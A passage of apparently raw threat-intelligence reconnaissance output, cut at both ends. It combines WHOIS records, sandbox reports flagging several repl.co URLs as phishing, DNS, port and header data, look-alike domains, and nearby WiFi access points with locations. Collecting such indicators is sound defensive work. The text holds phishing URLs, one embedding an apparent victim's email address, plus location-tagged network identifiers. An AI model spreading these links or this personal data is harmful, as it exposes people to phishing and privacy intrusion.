to: (1) enable high volume, automated, electronic processes that stress or load this whois database system providing you this information; or (2) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via direct mail, electronic mail, or by telephone. The compilation, repackaging, dissemination or other use of this data is expressly prohibited without prior written consent from us. We reserve the right to modify these terms at any time. By submitting this query, you agree to abide by these terms. Version 6.3 4/3/2002 2022-12-18 00:06:37 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': None, u'total_processes': 15, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://567893.568093.repl.co/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"567893.568093.repl.co"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.149.204.188:443"\n "172.217.14.202:443"\n "142.251.33.99:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7300:120:WilError_01"\n "Local\\SM0:872:120:WilError_01"\n "Local\\SM0:872:304:WilStaging_02"\n "Local\\InternetShortcutMutex"\n "Local\\SM0:7300:304:WilStaging_02"\n "Local\\SM0:7300:120:WilError_01"\n "Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7300:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:6072:304:WilStaging_02"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\shared_proto_db\\metadata\\000003.log]- [targetUID: 00000000-00007300]\n "Part-DE" has type "data"- Location: [%TEMP%\\7300_1309003135\\Part-DE]- [targetUID: 00000000-00007300]\n "ffdef2eb-b13e-4c4a-b636-dcf1dc50f84b.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ffdef2eb-b13e-4c4a-b636-dcf1dc50f84b.tmp]- [targetUID: 00000000-00007300]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00007300]\n "5f12d478-216d-4154-8599-aaf1569f8315.tmp" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Ad Blocking\\5f12d478-216d-4154-8599-aaf1569f8315.tmp]- [targetUID: 00000000-00007300]\n "manifest.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\CertificateRevocation\\6498.2022.5.1\\manifest.json]- [targetUID: 00000000-00007300]\n "602356ed-a79c-4174-a692-bce7264c1802.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\602356ed-a79c-4174-a692-bce7264c1802.tmp]- [targetUID: 00000000-00007300]\n "b7c84071-5459-4186-900e-239fed17e8fc.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\b7c84071-5459-4186-900e-239fed17e8fc.tmp]- [targetUID: 00000000-00007300]\n "crl-set" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\CertificateRevocation\\6498.2022.5.1\\crl-set]- [targetUID: 00000000-00007300]\n "manifest.json" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\CertificateRevocation\\6498.2022.5.1\\manifest.json]- [targetUID: 00000000-00007300]\n "Part-ZH" has type "data"- Location: [%TEMP%\\7300_1309003135\\Part-ZH]- [targetUID: 00000000-00007300]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00005924]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00007300]\n "6f303046-038f-4d70-8605-69e3084c809f.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\6f303046-038f-4d70-8605-69e3084c809f.tmp]- [targetUID: 00000000-00007300]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\CertificateRevocation\\6498.2022.5.1\\manifest.fingerprint]- [targetUID: 00000000-00007300]\n "e657712d-ab9b-47fe-9b36-58c8c9e72709.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\e657712d-ab9b-47fe-9b36-58c8c9e72709.tmp]- [targetUID: 00000000-00004980]\n "adblock_snippet.js" has type "ASCII text with very long lines with no line terminators"- Location: [%TEMP%\\7300_1309003135\\adblock_snippet.js]- [targetUID: 00000000-00007300]\n "LOG" has type "ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\shared_proto_db\\metadata\\LOG]- [targetUID: 00000000-00007300]\n "shopping_iframe_driver.js" has type "ASCII text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7300_288640161\\shopping_iframe_driver.js]- [targetUID: 00000000-00007300]'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://567893.568093.repl.co/"\n Pattern match: "https://567893.568093.repl.co"\n Heuristic match: "567893.568093.repl.co"\n Heuristic match: "1t;ps_//\'56_893.__6_C93.repl.co"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-35', u'name': u'Drops script files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 1, u'type': 8, u'description': u'Dropped file: "adblock_snippet.js" - Location: [%TEMP%\\7300_1309003135\\adblock_snippet.js]- [targetUID: 00000000-00007300]\n Dropped file: "shopping_iframe_driver.js" - Location: [%TEMP%\\7300_288640161\\shopping_iframe_driver.js]- [targetUID: 00000000-00007300]\n Dropped file: "edge_driver.js" - Location: [%TEMP%\\7300_288640161\\edge_driver.js]- [targetUID: 00000000-00007300]\n Dropped file: "auto_open_controller.js" - Location: [%TEMP%\\7300_288640161\\auto_open_controller.js]- [targetUID: 00000000-00007300]\n Dropped file: "shopping.js" - Location: [%TEMP%\\7300_288640161\\shopping.js]- [targetUID: 00000000-00007300]\n Dropped file: "edge_tracking_page_validator.js" - Location: [%TEMP%\\7300_288640161\\edge_tracking_page_validator.js]- [targetUID: 00000000-00007300]\n Dropped file: "edge_confirmation_page_validator.js" - Location: [%TEMP%\\7300_288640161\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00007300]\n Dropped file: "shoppingfre.js" - Location: [%TEMP%\\7300_288640161\\shoppingfre.js]- [targetUID: 00000000-00007300]\n Dropped file: "product_page.js" - Location: [%TEMP%\\7300_288640161\\product_page.js]- [targetUID: 00000000-00007300]\n Dropped file: "edge_checkout_page_validator.js" - Location: [%TEMP%\\7300_288640161\\edge_checkout_page_validator.js]- [targetUID: 00000000-00007300]'}, {u'category': u'Spyware/Information Retrieval', u'origin': u'String', u'identifier': u'string-93', u'name': u'Found browser information locations related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1005', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1005', u'relevance': 5, u'threat_level': 1, u'type': 2, u'description': u'"2022/10/28-14:23:13.830 1bd4 Reusing MANIFEST C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\shared_proto_db\\metadata/MANIFEST-000001" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00007300-00000036-10285181\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Crashpad" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00007300-00000BE4-181934859\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\OptimizationGuidePredictionModels" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00007300-00000BE4-13831731778\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\blob_storage\\4d91e8be-1b94-4c4d-88fd-0ce806f4f8ed" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00007300-00000BE4-34530222198\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\blob_storage\\d0313995-11ad-4fbc-ac47-fb134ed2e3e0" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00007300-00000BE6-34542504978\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.28" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00007300-00000BE4-255949648359\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\scoped_dir7300_1766638344" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00007300-00000BE4-258127648537\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.28\\LICENSE" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00007300-00000BE2-258775174583\n "C:\\Users\\HAPUBWS\\AppData\\Local\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\scoped_dir7300_1766638344\\LICENSE" (Indicator: "microsoft\\edge\\user data") in Source: 00000000-00007300-00000BE2-258775174583\n "--ty 34.149.204.188 2022-12-18 00:13:51 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None support@ovh.net %% %% This is the AFNIC Whois server. %% %% complete date format: YYYY-MM-DDThh:mm:ssZ %% %% Rights restricted by copyright. %% See https://www.afnic.fr/en/domain-names-and-support/everything-there-is-to-know-about-domain-names/find-a-domain-name-or-a-holder-using-whois/ %% %% Use '-h' option to obtain more information about this service. %% domain: plague.fr status: ACTIVE eppstatus: active hold: NO holder-c: ANO00-FRNIC admin-c: ANO00-FRNIC tech-c: OVH5-FRNIC registrar: OVH Expiry Date: 2023-01-30T04:23:37Z created: 2014-01-30T04:23:37Z last-update: 2022-01-30T04:35:23Z source: FRNIC nserver: dns107.ovh.net nserver: ns107.ovh.net source: FRNIC key1-tag: 10120 key1-algo: 8 [RSASHA256] key1-dgst-t: 8 [SHA256] key1-dgst: 5BD52D51E250B4CC173D1D59D9A7F23891B3311873364A4F9B2B612EF4CDDD58 source: FRNIC registrar: OVH address: 2 Rue Kellermann address: 59100 ROUBAIX country: FR phone: +33.899701761 fax-no: +33.320200958 e-mail: support@ovh.net website: http://www.ovh.com anonymous: No registered: 1999-10-18T00:00:00Z source: FRNIC nic-hdl: ANO00-FRNIC type: PERSON contact: Ano Nymous registrar: OVH changed: 2019-01-04T14:49:13Z anonymous: YES remarks: -------------- WARNING -------------- remarks: While the registrar knows him/her, remarks: this person chose to restrict access remarks: to his/her personal data. So PLEASE, remarks: don't send emails to Ano Nymous. This remarks: address is bogus and there is no hope remarks: of a reply. remarks: -------------- WARNING -------------- obsoleted: NO eppstatus: associated eppstatus: active eligstatus: not identified reachstatus: not identified source: FRNIC nic-hdl: ANO00-FRNIC type: PERSON contact: Ano Nymous registrar: OVH anonymous: YES remarks: -------------- WARNING -------------- remarks: While the registrar knows him/her, remarks: this person chose to restrict access remarks: to his/her personal data. So PLEASE, remarks: don't send emails to Ano Nymous. This remarks: address is bogus and there is no hope remarks: of a reply. remarks: -------------- WARNING -------------- obsoleted: NO eppstatus: associated eppstatus: active eligstatus: not identified reachstatus: not identified source: FRNIC nic-hdl: OVH5-FRNIC type: ORGANIZATION contact: OVH NET address: OVH address: 140, quai du Sartel address: 59100 Roubaix country: FR phone: +33.899701761 e-mail: tech@ovh.net registrar: OVH changed: 2022-12-17T20:33:44.519173Z anonymous: NO obsoleted: NO eppstatus: associated eppstatus: active eligstatus: not identified reachstatus: not identified source: FRNIC >>> WHOIS request date: 2022-12-18T00:11:10.534955Z <<< 2022-12-18 00:07:55 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.info plague.fun 2022-12-18 00:07:17 Web Content Type No Web Spider 0 0 2 0 None text/html; charset=utf-8 http://misogyny.wtf/inject/UsRjS959Rqm4sPG4 2022-12-18 00:21:02 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["-"], "Connection": ["close"], "Content_Type": ["text/html"], "Date": [""]} 104.21.28.240 2022-12-18 00:09:43 Open TCP Port No LeakIX 0 0 2 0 None 188.114.97.3:80 188.114.97.3 2022-12-18 00:03:25 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None 185.204.149.34.bc.googleusercontent.com 34.149.204.185 2022-12-18 00:02:48 IPv6 Address No Mnemonic PassiveDNS 13 0 1 0 None 2606:4700:3033::6815:1cf0 plague.fun 2022-12-18 00:05:42 Raw Data from RIRs No Hybrid Analysis 0 0 2 0 None [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://lightsalmonstickyopenlook.eberech.repl.co/#kazuharu.fujimori%40aviationweek.com', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_df0_IESQMMUTEX_0_303"\n "IsoScope_df0_IESQMMUTEX_0_519"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3568"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_df0_IE_EarlyTabStart_0xc5c_Mutex"\n "IsoScope_df0_IESQMMUTEX_0_331"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_df0_ConnHashTable<3568>_HashTable_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_df0_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"code.jquery.com"\n "lightsalmonstickyopenlook.eberech.repl.co"\n "maxcdn.bootstrapcdn.com"\n "stackpath.bootstrapcdn.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.149.204.188:443"\n "104.18.10.207:443"\n "142.251.211.234:443"\n "104.17.25.14:443"\n "69.16.175.42:443"\n "104.18.11.207:443"\n "104.16.85.20:443"\n "142.250.217.74:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarA75.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarA74.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabA62.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "CabA73.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "ZDT1I5CP.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ZDT1I5CP.txt]- [targetUID: 00000000-00003568]\n Dropped file: "KW7GCVVC.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\KW7GCVVC.txt]- [targetUID: 00000000-00003568]\n Dropped file: "7BFR5W0J.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\7BFR5W0J.txt]- [targetUID: 00000000-00001336]\n Dropped file: "BWKPCNHC.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\BWKPCNHC.txt]- [targetUID: 00000000-00001336]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "urlref_httpslightsalmonstickyopenlook.eberech.repl.co#kazuharu.fujimori%40aviationweek.com" has type "HTML document ASCII text"- [targetUID: N/A]\n "bootstrap.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "TarA75.tmp" has type "data"- Location: [%TEMP%\\TarA75.tmp]- [targetUID: 00000000-00001336]\n "jquery.session.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "ZDT1I5CP.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ZDT1I5CP.txt]- [targetUID: 00000000-00003568]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00001336]\n "jquery-3.2.1.slim.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "CabA62.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabA62.tmp]- [targetUID: 00000000-00001336]\n "jquery.min_3_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "KW7GCVVC.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\KW7GCVVC.txt]- [targetUID: 00000000-00003568]\n "~DF1B56E154B17285C0.TMP" has type "data"- Location: [%TEMP%\\~DF1B56E154B17285C0.TMP]- [targetUID: 00000000-00003568]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"- [targetUID: N/A]\n "CabA73.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabA73.tmp]- [targetUID: 00000000-00001336]\n "dberr.txt" has type "ASCII text with CRLF line terminators"- Location: [%WINDIR%\\System32\\catroot2\\dberr.txt]- [targetUID: 00000000-00001336]\n "TarA74.tmp" has type "data"- Location: [%TEMP%\\TarA74.tmp]- [targetUID: 00000000-00001336]\n "7BFR5W0J.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\7BFR5W0J.txt]- [targetUID: 00000000-00001336]\n "css_4_.css" has type "ASCII text"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'String', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://lightsalmonstickyopenlook.eberech.repl.co/#kazuharu.fujimori%40aviationweek.com"\n Pattern match: "https://lightsalmonstickyopenlook.eberech.repl.co"\n Heuristic match: "code.jquery.com"\n Heuristic match: "lightsalmonstickyopenlook.eberech.repl.co"\n Heuristic match: "maxcdn.bootstrapcdn.com"\n Heuristic match: "stackpath.bootstrapcdn.com"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-0', u'name': u'Sample was identified as malicious by at least one Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 0, u'threat_level': 1, u'type': 12, u'description': u'7/91 Antivirus vendors marked sample as malicious (7% detection rate)'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-6', u'name': u'Found an IP/URL artifact that was identified as malicious by at least three reputation engines', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 12, u'description': u'8/91 reputation engines marked "http://lightsalmonstickyopenlook.eberech.repl.co" as malicious (8% detection rate)\n 7/91 reputation engines marked "https://lightsalmonstickyopenlook.eberech.repl.co/" as malicious (7% detection rate)\n 7/91 reputation engines marked "https://lightsalmonstickyopenlook.eberech.repl.co" as malicious (7% detection rate)'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-11', u'name': u'The analysis extracted a file that was identified as malicious', u'attck_id_wiki': None, u'threat_level_human': u'malicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 2, u'type': 8, u'description': u'27/60 Antivirus vendors marked dropped file "urlref_httpslightsalmonstickyopenlook.eberech.repl.co#kazuharu.fujimori%40aviationweek.com" as malicious (classified as "JS.Heur.Phishing.7.CD3625D9" with 45% detection rate)'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-5', u'name': u'Sample was identified as malicious by a trusted Antivirus engine', u'attck_id_wiki': None, u'threat_level_human': u'malicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 2, u'type': 12, u'description': u'No specific details available'}], u'threat_level': 2, u'size': None, u'job_id': u'6396afc57936a656c93b1410', u'target_url': None, u'interesting': 34.149.204.188 2022-12-18 00:21:06 Open TCP Port No Censys 0 0 2 0 None 172.67.147.230:8880 172.67.147.230 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None Dubtronicssid (Net ID: 00:01:24:F0:BB:A4) 37.780462,-122.390564 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None zoom2888 (Net ID: 00:01:38:85:BD:9E) 37.780462,-122.390564 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None myLGNet4862 (Net ID: 00:01:36:5B:48:60) 37.780462,-122.390564 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None SurfandSip (Net ID: 00:02:2D:03:87:91) 37.7803446,-122.3906132 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None 410HowardStudios (Net ID: 00:02:2D:00:25:63) 37.7803446,-122.3906132 2022-12-18 00:24:21 Malicious Internet Name Yes MetaDefender 0 1 1 0 None avira.com [misogyny.wtf] misogyny.wtf 2022-12-18 00:21:54 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77a9a3cbbc7013fb-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": [""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 104.21.7.179 2022-12-18 00:08:31 Netblock Membership No RIPE 1 0 2 0 None 104.21.0.0/20 104.21.7.179 2022-12-18 00:21:58 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 7795ba721cfd2a2d-ORD Content-Encoding: gzip 2a06:98c1:3120::1 2022-12-18 00:09:41 Co-Hosted Site No HackerTarget 0 0 2 0 None acnscrty.rcvry.workers.dev 172.67.147.230 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None zoom1330 (Net ID: 00:01:38:92:E5:07) 37.7803446,-122.3906132 2022-12-18 00:42:27 Malicious IP Address Yes VirusTotal 0 0 3 0 None VirusTotal [188.114.96.17] https://www.virustotal.com/en/ip-address/188.114.96.17/information/ 188.114.96.0/24 2022-12-18 00:04:00 Physical Location No ipstack 0 0 1 0 None Netherlands 137.117.157.128 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None validarpichincha.ecuadorr.repl.co 34.149.204.188 2022-12-18 00:25:33 Affiliate - Domain Name No DNS Resolver 0 0 3 0 None securemail.pro webmail-fr.securemail.pro 2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None 2WIRE522 (Net ID: 00:01:E6:93:CB:2D) 37.780462,-122.390564 2022-12-18 00:06:06 Similar Domain Yes Tool - DNSTwist 1 0 1 0 None ras.putain.fr rasputain.fr 2022-12-18 00:02:45 Raw Data from RIRs No CertSpotter 1 0 1 0 None [{u'pubkey_sha256': u'432961d5f32390043415639e54b3b0f65069a835707a1a3b93e937e211e4a25d', u'revoked': False, u'not_after': u'2022-12-19T20:09:19Z', u'id': u'4202706731', u'cert': {u'data': 